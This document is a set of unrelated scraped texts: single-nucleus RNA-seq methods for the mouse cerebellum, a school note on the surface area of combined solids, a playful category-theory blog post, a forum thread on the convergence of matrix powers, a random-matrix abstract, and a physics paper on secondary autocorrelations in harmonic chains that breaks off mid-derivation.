At this stage, we merged several clusters (primarily granule cell clusters) based on shared expression of canonical cell type markers, and removed one cluster whose top differentially expressed genes were mitochondrial (resulting in 11 clusters). For subsequent rounds of cluster annotation within these major cell type clusters, we applied a variation of the LIGER workflow previously described12, using integrative non-negative matrix factorization (iNMF) to limit the effects of sample- and sex-specific gene expression. In brief, we normalized each cell by the number of UMIs, selected highly variable genes7 and spatially variable genes (see section below), performed iNMF, and clustered using Louvain community detection (omitting the quantile normalization step). Clusters whose top differentially expressed genes indicated contamination from a different cell type or high expression of mitochondrial genes were removed during the annotation process, and not included in subsequent rounds of annotation. This iterative annotation process was repeated until no contaminating clusters were identified in a round of clustering. Differential expression analysis within rounds of annotation was performed with the Wilcoxon rank sum test using Seurat’s FindAllMarkers function. Comprehensive differential expression analysis across all 46 final annotated clusters was performed using the wilcoxauc function from the presto package39. A full set of parameters used in the LIGER annotation steps and further details can be found in Supplementary Table 4. For visualization as in Fig. 1b, we merged all annotated high-quality nuclei and repeated preliminary preprocessing steps before performing UMAP using 25 principal components.

Integrated analysis of human and mouse data

After generation of digital gene expression matrices for the human nuclei profiles, we filtered out nuclei with fewer than 500 UMIs. We then performed a preliminary round of cell type annotation using the standard LIGER workflow (integrating across batches) to identify the primary human interneuron populations (UBCs, MLIs and PLIs, Golgi cells, granule cells; based on the same markers as in Supplementary Table 1). We repeated an iteration of the same workflow for the four cell populations specified above (with an additional quantile normalization step) in order to identify and remove putative doublet and artefactual populations. Finally, we performed iNMF metagene projection as previously described40 to project the human datasets into latent spaces derived from the corresponding mouse cell type datasets. We then performed quantile normalization and Louvain clustering, assigning joint clusters based on the previously annotated mouse data clusters. For the granule cell joint analysis, we first limited the mouse data to include only the five cerebellar regions sampled in human data collection (lobules II, VII, VIII, IX and X). For the Golgi cell joint analysis, we performed iNMF (integrating across species), instead of metagene projection.

Spatially variable gene selection

To identify genes with high regional variance, we first computed the log of the index of dispersion (log variance-to-mean ratio, logVMR) for each gene, across each of the 16 lobular regions. Next, we simulated a Gaussian null distribution whose centre was the logVMR mode, found by performing a kernel density estimation of the logVMRs (using the density function in R, followed by the turnpoints function).
The standard deviation of the Gaussian was computed by reflecting the values less than the mode across the centre. Genes whose logVMRs were in the upper tail with P < 0.01 (Benjamini–Hochberg adjusted) were ruled as spatially variable. For the granule cell and PC cluster analyses, adjusted P-value thresholds were set to 0.001 and 0.002, respectively.

Cluster regional composition testing and lobule enrichment

To determine whether the lobule composition of a cluster differs significantly from the corresponding outer level cell type lobule distribution, we used a multinomial test approximated by Pearson’s chi-squared test with k − 1 degrees of freedom, in which k was the total number of lobules sampled (16). The expected number of nuclei for a cluster i and lobule j was estimated as follows:

$$E_{ij}=N_{i}\times \frac{N_{j}}{\sum_{j}N_{j}}$$

where Ni is the total number of nuclei in cluster i and Nj is the number of nuclei in lobule j (across all clusters in the outer level cell type, as defined below). The resulting P values were FDR-adjusted (Benjamini–Hochberg) using the p.adjust function in R. Lobule enrichment (LE) scores for each cluster i and each lobule j were calculated by:

$$\mathrm{LE}_{ij}=\frac{n_{ij}\,/\,\sum_{j}n_{ij}}{N_{j}\,/\,\sum_{j}N_{j}}$$

in which nij is the observed number of nuclei in cluster i and lobule j, and Nj is the number of nuclei in lobule j (across all clusters in the outer level cell type). For this analysis, we used the coarse cell type definitions shown coloured in Fig. 2a, and merged the PLI clusters. For lobule composition testing and the replicate consistency analysis below, we downsampled granule cells to 60,000 nuclei (the next most numerous populations were the MLI and PLI clusters, with 45,767 nuclei).

To determine the consistency of lobule enrichment scores across replicates in each region, we designated two sets of replicates by assigning nuclei from the most represented replicate in each region and cluster analysis to ‘replicate 1’ and nuclei from the second most represented replicate in each region to ‘replicate 2’. This assignment was used because not all regions had representation from all individuals profiled, and some had representation from only two individuals. We calculated lobule enrichment scores for each cluster using each of the replicate sets separately; we then calculated the Pearson correlation between the two sets of lobule enrichment scores for each cluster. We would expect correlation to be high for clusters when lobule enrichment is biologically consistent. We note that one cluster (Purkinje_Aldoc_2) was excluded from the replicate consistency analysis as, under this design, it had representation from only a single aggregated replicate. However, we confirmed that lobule enrichment for this cluster was strongly consistent with Allen Brain Atlas expression staining (Extended Data Fig. 3c).

Continuity of gene expression

To characterize molecular variation across cell types, we attempted to quantify the continuity of scaled gene expression across a given cell type pair, ordered by pseudotime rank (calculated using Monocle2). For each gene, we fit a logistic curve to the scaled gene expression values and calculated the maximum slope (m) of the resulting curve, after normalizing for both the number of cells and the dynamic range of the logistic fit. To limit computational complexity, we downsampled cell type pairs to 5,000 total nuclei.
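A minimal sketch of this m-value computation (ours; the function names are hypothetical, scipy is assumed, and the normalization is our reading of “normalizing for the number of cells and dynamic range”): fit a logistic curve to scaled expression ordered by pseudotime rank and report its normalized maximum slope.

```python
import numpy as np
from scipy.optimize import curve_fit

def logistic(x, L, k, x0, b):
    return b + L / (1.0 + np.exp(-k * (x - x0)))

def max_slope_m(expr_scaled: np.ndarray) -> float:
    """Fit a logistic along pseudotime rank; return the maximum slope,
    normalized by cell number and the dynamic range of the fit."""
    n = expr_scaled.size
    x = np.arange(n, dtype=float)                       # pseudotime rank
    p0 = [float(np.ptp(expr_scaled)), 4.0 / n, n / 2.0, float(expr_scaled.min())]
    (L, k, x0, b), _ = curve_fit(logistic, x, expr_scaled, p0=p0, maxfev=10_000)
    max_slope = abs(L * k) / 4.0                        # slope of the logistic at x0
    return max_slope * n / abs(L)                       # cell-count and range normalization
```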
We fit curves and computed m values for the most significantly differentially expressed genes across five cell type pairs (Fig. 3b). Differentially expressed genes were determined using Seurat’s FindMarkers function. We then plotted the cumulative distribution of m values for the top 200 genes for each cell type pair; genes were selected based on ordering by absolute Spearman correlation between scaled gene expression and pseudotime rank.

Trajectory analysis of peri- and postnatal mouse cerebellum data

After generation of digital gene expression matrices for the peri- and postnatal mouse profiles, we filtered out nuclei with fewer than 500 UMIs. We applied the LIGER workflow (similarly to the adult mouse data analysis) to identify clusters corresponding to major developmental pathways. We then isolated the cluster corresponding to GABAergic progenitors (marked by expression of Tfap2b and other canonical markers). We performed a second iteration of LIGER iNMF and Louvain clustering on this population and generated a UMAP representation. Using this UMAP representation, we calculated pseudotime ordering and a corresponding trajectory graph with Monocle3 (ref. 41). To identify modules of genes which varied along the computed trajectory, we used the graph_test and find_gene_modules functions from Monocle3.

Reporting summary

Further information on research design is available in the Nature Research Reporting Summary linked to this paper.
https://www.shaalaa.com/concept-notes/surface-area-combination-solids_1411
# Surface Area of a Combination of Solids

#### notes

We have already learnt about the surface areas and volumes of basic figures; in this chapter we are given different combinations of solids. We are familiar with solids like the cylinder, sphere, cone, cuboid and cube, and here we are supposed to find the surface areas of different combinations of such solids.

Before we proceed, we must understand what curved surface area is. Solids with a curved surface include the cone and the cylinder. The curved surface area is the area of the outer curved portion only; the area of the flat ends of such solids is not included while calculating the curved surface area. While calculating the total surface area, however, we must include the area of the flat ends of the solid, provided that the solid is not hollow from inside.

Example: Two cubes, each of volume 64 cm^3, are joined end to end. Find the surface area of the resulting cuboid.

Solution:
Volume of cube = 64 cm^3
edge^3 = 64 cm^3
edge = root(3)(64) cm = 4 cm

By joining the two cubes we get a cuboid. Since we have two cubes, the length is doubled; therefore
length = 2(4) = 8 cm, breadth = 4 cm, height = 4 cm

Surface area of cuboid = 2(lb + bh + hl)
= 2[(8 xx 4) + (4 xx 4) + (4 xx 8)]
= 2(32 + 16 + 32)
= 2(80)
Surface area of cuboid = 160 cm^2
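A quick computational check of this worked example (a minimal Python sketch; the function name is ours):

```python
def cuboid_surface_area_from_cubes(cube_volume_cm3: float, n_cubes: int = 2) -> float:
    """Surface area of the cuboid formed by joining n equal cubes end to end."""
    edge = cube_volume_cm3 ** (1 / 3)          # edge of each cube, in cm
    l, b, h = n_cubes * edge, edge, edge       # cuboid dimensions
    return 2 * (l * b + b * h + h * l)         # 2(lb + bh + hl)

print(round(cuboid_surface_area_from_cubes(64), 6))   # 160.0 cm^2
```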
http://epistle-null.blogspot.com/2012/07/
## Sunday, July 29, 2012 ### From a whisk-user Dear Gelatinifers, I wish to register a complaint; specifically, without endorsing the heresy sometimes wrongly known as "Luddite", it is nonetheless my firmly-held belief that recipes artificially biased in favour of electromechanical mixing apparatus should only be packaged with electromechanical mixing apparatus (and otherwise appear in books describing what they are), not with foodstuffs. I'm sure I shall, after one or two more trials, adapt the method so as not to melt the cream I've just whipped, but I don't see why I should have to use up the whole box of whatever it is you actually sold me, before it is properly useful, after you pretend to suggest a recipe. As it is, I'm rather tempted to just get me a bottle of orange-infused curaçao (or maybe kirsch!) and go back to meringue mousse. a disgruntled cook ## Tuesday, July 17, 2012 ### Jigsaw Dear Crowsfort, I have a jigsaw puzzle. The pieces look like squares $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ ... actually, $f,g,h,k$ all know what their corners are, so we could leave out the $A,B,C,D$, but this gets distracting. Also, the $\Downarrow$ deserves to have a name, only I can't think of a good way to make it all fit. Which particular $\Downarrow$ a square has in it makes a difference, later! Two pieces sharing an edge fit together, so that $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \\ C & \overset{k}{\to} & D \\ g'\downarrow & \Downarrow & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ make a rectangle $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \overset{k}{\to} & D \\ g'\downarrow & \Downarrow & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ or sometimes $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & & \downarrow h\\ C & \Downarrow & D \\ g'\downarrow & & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ and can even be squished down to a square $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g'g\downarrow & \Downarrow & \downarrow h'h\\ E & \underset{l}{\to} & F \end{array}$ which is handy, though we don't often want to do that. The good people who cut out my jigsaw puzzle were very nice, and provided an unlimited supply of various standard shapes, guaranteed to fit certain sorts of corners, so that if anywhere in the puzzle you find $\begin{array}{ccc} & & A \\ & & \downarrow f\\ B & \underset{g}{\to} & C \end{array}$ you can add in a square $\begin{array}{ccc} P_{f,g} & \to & A \\ \downarrow & \lrcorner & \downarrow f\\ B & \underset{g}{\to} & C \end{array}$ and in the same way, if you have $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g \downarrow & & \\ C & & \end{array}$ you can fill it in $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g \downarrow & \ulcorner & \downarrow \\ C & \to & Q_{f,g} \end{array}$ There is one other sort of handy square, looking like $\begin{array}{ccc} A & \overset{f}{\to} & B \\ f\downarrow & = & \downarrow g \\ B & \underset{g}{\to} & C \end{array}$ which lets you go around corners, when it looks like a good idea. These have two further special types, $\begin{array}{ccc} A & \overset{f}{\to} & B \\ f\downarrow & = & \downarrow = \\ B & \underset{=}{\to} & B \end{array}$ ... 
and there is another of the similar sort that I'm sure you can guess; and there are also vertical and horizontal versions of $\begin{array}{ccc} A & = & A \\ f\downarrow & = & \downarrow f \\ B & \underset{=}{\to} & B \end{array}$ which also happens to be a $\lrcorner$ and a $\ulcorner$. Actually, those last two squares are special cases of these two: $\begin{array}{ccc} A & \overset{f}{\to} & B \\ =\downarrow & = & \downarrow g\\ A & \underset{g f}{\to} & C \end{array}$ and $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g f \downarrow & = & \downarrow g\\ C & \underset{=}{\to} & C \end{array}$ or reflections of them; but most of these are neither $\lrcorner$ nor $\ulcorner$. They were also kind enough to suggest a few ways to get started, using a special corner called "$*$", or "the point", though it's not really the point of all this. Still, there's always exactly one edge $A\to *$, no matter what $A$ is, and you can also draw it vertically: $\begin{array}{c} A\\ \downarrow \\ * \end{array}$ The corner $*$ also has another nifty feature, that the collection of edges $* \to A$ might as well be called $A$. There's only one corner, $\{\}$, to which you can't draw an arrow from $*$; but on the other hand, there's always exactly one arrow from $\{\}$ to any other corner $A$, including to $*$! So, for instance, there's a nice corner $\begin{array}{ccc} \{\} & \to & * \\ \downarrow & & \\ * \end{array}$ and because of the $\ulcorner$ pieces, this gets filled-in as $\begin{array}{ccc} \{\} & \to & * \\ \downarrow & \Box & \downarrow\\ * & \to & * + * \end{array}$ although it's more common, among my fellow puzzlers, to call that new thing $\mathbb{S}^0$. It has two points, as you can see. Oh! this one tile happens to be of *both* sorts: it's the standard tile to fill-in those two edges $*\to \mathbb{S}^0$ as well as the standard tile to fill-in the edge $\{\}\to*$ drawn twice from a single copy of $\{\}$. Sometimes it's fun just to look at the special pieces $\begin{array}{ccc} A & \to & * \\ \downarrow & \ulcorner & \downarrow \\ * & \to & \Sigma A \end{array}$ which highlight a fascinating sequence of corner labels $A, \Sigma A, \Sigma^2 A, \ldots$ --- the ones you get starting with $\mathbb{S}^0$ are called the spheres (or homotopy spheres) and have the special names $\mathbb{S}^n = \Sigma^n \mathbb{S}^0$. Going in the other direction --- if you have a favourite arrow $* \overset{a}{\to} A$, the special square you get is labelled $\begin{array}{ccc} \Omega_a A & \to & * \\ \downarrow & \lrcorner & \downarrow a\\ * & \underset{a}{\to} & A \end{array}$ ...
to tell you how one is supposed to keep going after that, I have to tell you one last thing about the special squares labelled $\lrcorner$ and $\ulcorner$; given any square at all $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ there are of course the standard two squares $\begin{array}{ccc} P_{h,k} & \to & B \\ \downarrow & \lrcorner & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ and the other one to $Q_{f,g}$; in essence, what it means to be a $\lrcorner$ is that there's essentially just one edge $A \overset{w}{\to} P_{h,k}$ that fits into this puzzle $\begin{array}{ccccc} A & \overset{=}{\to} & A & \overset{f}{\to} & B \\ =\downarrow & = & w \downarrow & \Downarrow & \downarrow = \\ A & \underset{w}{\to} & P_{h,k} & \to & B \\ g\downarrow & \Downarrow & \downarrow & \lrcorner & \downarrow h \\ C & \underset{=}{\to} & C & \underset{k}{\to} & D \end{array}$ There's a similar story about unique edges $Q_{f,g} \to D$ that fit in another puzzle --- try it and see! But particularly, since we always have this square $\begin{array}{ccc} * & \to & * \\ \downarrow & = & \downarrow a\\ * & \underset{a}{\to} & A \end{array}$ there's exactly one $* \to \Omega_a A$ that fits in all the necessary puzzles, and this is what lets us keep going to make new spaces $\Omega^2_a A, \cdots$. Here's a puzzle for you: come up with a good edge $A \to \Omega_{?} \Sigma A$! This entails finding a way to fill-in that $?$; you should be able to think of perhaps-two. There are lots of things I haven't mentioned, but of course, that will always be true, even if I say all the things that should come first! You're welcome to play with the jigsaw, too; we'll never run out of pieces! the joiner
https://www.physicsforums.com/threads/convergence-of-matrix-equations.47411/
# Convergence of matrix equations

1. Oct 12, 2004

### gogetagritz

I am pretty rusty/unknowledgeable when it comes to linear algebra, so when I was given the problem: find the limit as n -> infinity of A^n * b, where A is a 2x2 matrix and b is a 2x1 vector, I scratched my head. A fellow student told me about the spectral radius being the largest eigenvalue of A in absolute value, and if it is less than one then the sequence converges to zero. However my eigenvalues are not less than one. So what methods are there for determining an actual x, y that this system converges to?

2. Oct 13, 2004

### matt grime

Since A is 2x2 it satisfies a second order polynomial, the characteristic equation

X^2 + uX + v = 0 for some u, v in R.

So, A^n = -uA^{n-1} - vA^{n-2} for n greater than or equal to 2.

If A^n b converges to anything at all, can you see how to find what it converges to now?
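A quick numerical way to see where this hint leads (a hedged sketch, not from the thread; numpy assumed): if A^n b converges to some L, then passing to the limit in A^n b = A (A^{n-1} b) gives A L = L, so L lies in the eigenvalue-1 eigenspace (or is zero). With eigenvalues 1 and |lambda| < 1, the limit is the eigenvalue-1 component of b:

```python
import numpy as np

# Example: A has eigenvalues 1 and 0.5, so A^n b converges to the
# projection of b onto the eigenvalue-1 eigenvector.
A = np.array([[0.75, 0.25],
              [0.25, 0.75]])
b = np.array([2.0, 0.0])

# Direct iteration
x = b.copy()
for _ in range(200):
    x = A @ x

# Eigendecomposition: keep only the eigenvalue-1 component;
# components with |eigenvalue| < 1 die off as n -> infinity.
vals, vecs = np.linalg.eig(A)
coeffs = np.linalg.solve(vecs, b)      # b expressed in the eigenbasis
keep = np.isclose(vals, 1.0)
limit = vecs @ (coeffs * keep)

print(x, limit)                        # both ~ [1.0, 1.0]
```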
http://math-mprf.org/journal/articles/id1227/
The Random Matrix Technique of Ghosts and Shadows

A. Edelman

2010, v.16, №4, 783-790

ABSTRACT

We propose to abandon the notion that a random matrix exists only if it can be sampled. Much of today's applied finite random matrix theory concerns real or complex random matrices ($\beta=1,2$). The "threefold way" so named by Dyson in 1962 [F.J. Dyson, The threefold way. Algebraic structure of symmetry groups and ensembles in quantum mechanics. J. Math. Phys., 1962, v. 3, pp. 1199-1215] adds quaternions ($\beta=4$). While it is true there are only three real division algebras ($\beta$ = "dimension over the reals"), this mathematical fact, while critical in some ways, is in other ways irrelevant and perhaps has been over-interpreted over the decades. We introduce the notion of a "ghost" random matrix quantity that exists for every beta, and a shadow quantity, which may be real or complex, which allows for computation. Any number of computations have successfully given reasonable answers to date, though difficulties remain in some cases. Though it may seem absurd to have a "three and a quarter"-dimensional or "pi"-dimensional algebra, that is exactly what we propose and what we compute with. In the end $\beta$ becomes a noisiness parameter rather than a dimension.

Keywords: random matrix theory, ghost random variables
https://www.groundai.com/project/correlations-of-correlations-secondary-autocorrelations-in-finite-harmonic-systems/
# Correlations of correlations: Secondary autocorrelations in finite harmonic systems

Dan Plyukhin, Department of Computer Science, University of Toronto, Toronto, ON, Canada
Alex V. Plyukhin, Department of Mathematics, Saint Anselm College, Manchester, NH, USA

July 29, 2019

###### Abstract

The momentum or velocity autocorrelation function $C(t)$ for a tagged oscillator in a finite harmonic system decays like that of an infinite system for short times, but exhibits erratic behavior at longer time scales. We introduce the autocorrelation function of the long-time noisy tail of $C(t)$ (“a correlation of the correlation”), which characterizes the distribution of recurrence times. Remarkably, for harmonic systems with same-mass particles this secondary correlation may coincide with the primary correlation (when both functions are normalized) either exactly, or over a significant initial time interval. When the tagged particle is heavier than the rest, the equality does not hold; the correlations then show a non-random pattern on long time scales, and higher-order correlations converge to the lowest normal mode.

###### pacs: 05.40.Ca, 05.20.Gg

## I Introduction

The theme of fluctuations in finite systems of harmonic oscillators emerges naturally in both application and theory. From a theoretical point of view, the study of the stochastic dynamics of a tagged degree of freedom in finite harmonic systems provides a valuable illustration, and often more than that, of the role of the thermodynamic and weak-coupling limits, ergodicity, thermalization, recurrences, synchronization, and other basic concepts in nonequilibrium phenomena Zwanzig (); Mazur (); Cukier (); Kac (); Vig (); Jin (); Bend (). Another relevant area is Langevin dynamics generated by a coupling to a finite harmonic bath(s), and its application to mesoscopic systems and networks; see PS (); Hanggi (); Zhou (); Beims (); Onofrio (); Hasegawa (); Akai ().

Being nonergodic, the capability of harmonic systems to illustrate general phenomena in statistical mechanics might seem doubtful at first glance. By means of a canonical transformation a harmonic system of any size can be transformed into a collection of independent oscillators, or normal modes; since the energies of normal modes are the integrals of motion, a single isolated harmonic system does not equilibrate and is not very interesting from the point of view of statistical mechanics. A more fruitful approach is to consider an ensemble of harmonic systems, assuming that in the past they were in contact with a larger thermal bath in equilibrium at a given temperature, and that the initial normal modes of the ensemble are distributed according to the canonical distribution. Within this framework, one evaluates statistical averages of dynamical variables over the ensemble of the system’s initial coordinates rather than over time. Such averages show the transition of the ensemble to thermal equilibrium in the limit of a large number of particles, and thus the nonergodic nature of harmonic systems does not explicitly manifest itself, and for most cases is inessential.
It should however be stressed that this framework, which is standard for most works on stochastic dynamics of harmonic systems both classical and quantum, assumes a very special type of coupling between the system and the external thermal bath: this coupling justifies the initial conditions for the system’s degrees of freedom, yet is assumed to be sufficiently weak, or completely turned off, as not to affect the system’s further dynamics. The inequivalence for harmonic systems of ensemble- and time-averages, together with the almost exclusive exploitation in literature of the former, does not necessarily entail that the latter are inadequate. Rather, we introduce in this paper a new class of time-average correlations (we call these secondary correlations) which characterize recurrences in finite harmonic systems. For systems of same-mass particles, these correlations are shown to be very close, and under certain conditions exactly identical, to the conventional (primary) time correlations defined with ensemble averaging. This implies that for finite nonergodic systems, the use of both ensemble and time averages may give meaningful complementary descriptions, and that correlations with the two types of averaging may be related in some subtle way.

## II Secondary correlations

Consider the temporal autocorrelation function of a dynamical variable in a finite system of size $N$. Typically, such a function exhibits two distinctive regimes, separated by a crossover time $t^*$ of order $N/c$, where $c$ is the speed of signal propagation in the system. For short times $t\ll t^*$, the variable does not feel the presence of the boundaries, and the correlation function decays in a smooth regular way, following the same laws as for an infinitely large system. On the other hand, for longer times $t\gtrsim t^*$ the dynamics of the variable are affected by signals reflected from the boundaries. For long time regimes such as this, rather than decaying smoothly the correlation functions may exhibit erratic, apparently noisy, behavior Zwanzig (); Mazur ().

We illustrate this behavior in Fig. 1 by way of the normalized momentum correlation function for the central particle in a harmonic chain with fixed ends. The Hamiltonian of the system is

$$H=\frac{1}{2m}\sum_{i=1}^{N}p_i^2+\frac{m\omega^2}{2}\sum_{i=0}^{N}(q_i-q_{i+1})^2, \qquad (1)$$

which describes $N$ linearly coupled particles with momenta $p_i$ and displacements $q_i$, indexed $i=1,2,\ldots,N$, with the terminal particles fixed, $q_0=q_{N+1}=0$. Assuming $N$ is odd, the middle particle indexed

$$i_0=\frac{N+1}{2} \qquad (2)$$

has normalized ($C_{i_0}(0)=1$) momentum correlation function

$$C_{i_0}(t)=\frac{1}{\langle p_{i_0}^2(0)\rangle}\,\langle p_{i_0}(0)\,p_{i_0}(t)\rangle=\frac{2}{N+1}\,{\sum_{j=1}^{N}}{}'\cos\omega_j t, \qquad (3)$$

where the prime indicates that the summation is only over odd $j$. In this expression (we outline its derivation in the Appendix), the $\omega_j$ are frequencies of normal modes

$$\omega_j=2\omega\sin\frac{\pi j}{2(N+1)}, \qquad (4)$$

where $\omega$ is the frequency of a single oscillator, and the average is taken over the equilibrium ensemble of initial conditions. For $t\ll t^*$ the correlation function is very close to that of an infinite chain, given by the Bessel function

$$C_i(t)\approx C_\infty(t)=\lim_{i,N\to\infty}C_i(t)=J_0(2\omega t). \qquad (5)$$

This can be readily justified by approximating the sum (3) with an integral, and recognizing the latter as the well-known integral representation of $J_0$, see e.g. Lee (); PS (). More interesting from the perspective of this paper is the regime $t>t^*$, in which the correlation becomes irregular, see Fig. 1. It can be shown that the function given by (3) belongs to the class of almost periodic functions: any value which the function achieves once is achieved again, infinitely many times.
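The two regimes are easy to reproduce numerically. Below is a minimal Python sketch (ours, not part of the paper; numpy and scipy assumed) that evaluates the exact sum (3)-(4) and compares it with the infinite-chain limit $J_0(2\omega t)$ of Eq. (5):

```python
import numpy as np
from scipy.special import j0   # Bessel function J_0

def C_middle(t, N=101, omega=1.0):
    """Primary correlation C_{i0}(t) of the middle particle, Eqs. (3)-(4)."""
    j = np.arange(1, N + 1, 2)                          # odd normal modes only
    w = 2 * omega * np.sin(np.pi * j / (2 * (N + 1)))   # Eq. (4)
    return (2.0 / (N + 1)) * np.cos(np.outer(np.atleast_1d(t), w)).sum(axis=1)

t = np.linspace(0, 200, 4001)
C = C_middle(t)
# For t well below the crossover (t* ~ N/omega) the exact sum tracks
# J_0(2*omega*t); beyond it the function turns into an erratic tail.
print(np.max(np.abs(C[t < 20] - j0(2 * t[t < 20]))))    # tiny early-time error
```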
Traditionally, such functions are characterized by the average frequency with which they return to an assigned value $c$, or by the reciprocal, i.e. the mean recurrence time $\tau(c)$. For correlations of type (3) with large $N$, the famous result for the recurrence time, first obtained by Kac Kac () (see also Zwanzig (); Mazur (); Vig ()),

$$\tau(c)\sim e^{Nc^2} \qquad (6)$$

implies that recurrences of order $c$ or larger are exponentially rare. This result resolves, or rather (being derived for a model system) shows the direction of resolution for the paradoxes of irreversibility Zwanzig ().

In this paper we propose to characterize the irregular part of the function in another way, which is more in the spirit of nonequilibrium statistical mechanics than the mathematics of almost periodic functions. Namely, observing that for $t>t^*$ the correlation function appears to behave like stationary noise, we are encouraged to characterize it by a new correlation function

$$D_i(t)=\frac{1}{\langle C_i^2(\tau)\rangle_\tau}\,\langle C_i(\tau)\,C_i(\tau+t)\rangle_\tau \qquad (7)$$

defined with the time average

$$\langle\ldots\rangle_\tau=\lim_{T\to\infty}\frac{1}{T}\int_0^T(\ldots)\,d\tau. \qquad (8)$$

Since we are only interested in the interval when $C_i(t)$ behaves irregularly, one might prefer to set the lower integration limit in definition (8) to $t^*$ instead of zero. However this would only be an unnecessary complication, as the limit $T\to\infty$ makes the two definitions numerically equivalent (assuming always that the contribution of the interval $(0,t^*)$ is finite).

We shall refer to $D_i(t)$, defined by relations (7) and (8), as the secondary correlation function, and call $C_i(t)$ the primary one. We would like to promote the secondary correlation as a meaningful statistical tool for characterizing the distribution of recurrence times in a system of finite size. Such information is not contained in the Kac formula (6) for the average recurrence time $\tau(c)$, so the two functions $\tau(c)$ and $D_i(t)$ do not duplicate each other but describe recurrences in complementary ways.

## III Relation to primary correlations

Since the primary and secondary correlations $C_i(t)$ and $D_i(t)$ characterize recurrences at different levels and are defined using different types of averaging (over ensemble and time, respectively), the existence of any specific relation between them is perhaps a priori unexpected. Yet a simple numerical experiment with Eqs. (1)-(6) suggests, for the middle atom of a chain with fixed ends, the equality

$$C_{i_0}(t)=D_{i_0}(t). \qquad (9)$$

Closer scrutiny reveals that the equality is exact and holds for any $t$, such that the secondary correlation completely repeats the structure of the primary one for both regular ($t<t^*$) and noisy ($t>t^*$) domains and has the same crossover time $t^*$. The proof follows immediately from the relation

$$\langle\cos\omega_j\tau\,\cos\omega_{j'}(\tau+t)\rangle_\tau=\frac{\delta_{jj'}}{2}\cos\omega_j t \qquad (10)$$

which holds for an arbitrary spectrum of (nonzero) normal mode frequencies and can be verified by direct evaluation (with the help of L’Hospital’s rule). For frequencies that are integer multiples of a common base frequency this may further be reduced to the familiar orthogonality relation for the Fourier basis, and thus can be considered a generalized form of the latter. From (3) and (10) one obtains for the non-normalized secondary correlation

$$\langle C_{i_0}(\tau)\,C_{i_0}(\tau+t)\rangle_\tau=\Big(\frac{2}{N+1}\Big)^2{\sum_{j,k=1}^{N}}{}'\langle\cos\omega_j\tau\,\cos\omega_k(\tau+t)\rangle_\tau=\frac{1}{2}\Big(\frac{2}{N+1}\Big)^2{\sum_{j=1}^{N}}{}'\cos\omega_j t. \qquad (11)$$

Normalizing this function to unity at $t=0$ by dividing it by

$$\langle C_{i_0}^2(\tau)\rangle_\tau=\frac{1}{2}\Big(\frac{2}{N+1}\Big)^2\,\frac{N+1}{2}=\frac{1}{N+1}, \qquad (12)$$

one obtains the normalized secondary correlation

$$D_{i_0}(t)=\frac{\langle C_{i_0}(\tau)\,C_{i_0}(\tau+t)\rangle_\tau}{\langle C_{i_0}^2(\tau)\rangle_\tau}=\frac{2}{N+1}{\sum_{j=1}^{N}}{}'\cos\omega_j t \qquad (13)$$

which coincides with the primary correlation $C_{i_0}(t)$, Eq. (3).

One may observe that for the above derivation it is essential that the primary correlation takes the form of a superposition of cosines with equal weights, as in Eq. (3). In general this, of course, is not the case.
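The equality (9) can also be checked directly. The sketch below (our illustration; it approximates the time average (8) by a long but finite window $T$) builds $D_{i_0}(t)$ from samples of $C_{i_0}(t)$ and compares it with the primary correlation:

```python
import numpy as np

N, omega = 101, 1.0
j = np.arange(1, N + 1, 2)
w = 2 * omega * np.sin(np.pi * j / (2 * (N + 1)))

def C(t):                                    # Eq. (3), middle particle
    return (2.0 / (N + 1)) * np.cos(np.outer(np.atleast_1d(t), w)).sum(axis=1)

# Approximate <C(tau) C(tau + t)>_tau over a long window of length T
T, dt = 2.0e4, 0.1
tau = np.arange(0, T, dt)
Ctau = C(tau)
lags = np.arange(0, 40, 0.5)
D = np.array([np.mean(Ctau[: len(tau) - k] * Ctau[k:])
              for k in (lags / dt).astype(int)])
D /= np.mean(Ctau ** 2)                      # normalization, Eq. (7)

print(np.max(np.abs(D - C(lags))))           # small: D ~ C, i.e. Eq. (9)
```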
For example, for a chain with fixed ends described by the Hamiltonian (1), the normalized momentum correlation function for a particle with arbitrary index $i$ has the form (see Appendix)

$$C_i(t)=\sum_{j=1}^{N}A_{ij}^2\cos\omega_j t,\qquad A_{ij}=\sqrt{\frac{2}{N+1}}\,\sin\frac{\pi ij}{N+1}. \qquad (14)$$

For the middle particle $i=i_0$ this is reduced to (3), whereas for the other particles normal modes enter the expression (14) with different amplitudes $A_{ij}$. As one can immediately verify, the exact equality of primary and secondary correlations does not hold in these cases. An important example when this equality does hold for any particle is a harmonic chain with periodic boundary conditions. In this case the momentum correlation for each particle is a superposition of equally weighted normal modes Mazur (); Zwanzig ()

$$C_i(t)=\frac{1}{N}\sum_{j=0}^{N-1}\cos\omega_j t,\qquad \omega_j=2\omega\sin\Big(\frac{\pi j}{N}\Big), \qquad (15)$$

and repetition of the above derivation leads again to the exact equality $C_i(t)=D_i(t)$ for any particle of the system.

So far, even with the above examples of its validity, the equality of primary and secondary correlations may appear as no more than a curious coincidence. However, further numerical exercises reveal that even when the equality does not hold exactly, it remains a very good approximation for the initial time interval $t<\tau_i$, see Fig. 2. The duration of this interval, $\tau_i$, is found to depend non-monotonically on particle position $i$, and for any $i$ to be equal to or shorter than the crossover time, $\tau_i\le\tau_i^*$. Respectively, for $t<\tau_i$ both primary and secondary correlations coincide with the primary correlation for the infinite chain,

$$D_i(t)=C_i(t)=C_\infty(t)=J_0(2\omega t),\qquad t<\tau_i. \qquad (16)$$

The proof of the approximate equality (16) can be carried out as follows. From the expression (14) for $C_i(t)$ and the definition (7) for $D_i(t)$, and using the relation (10), one gets

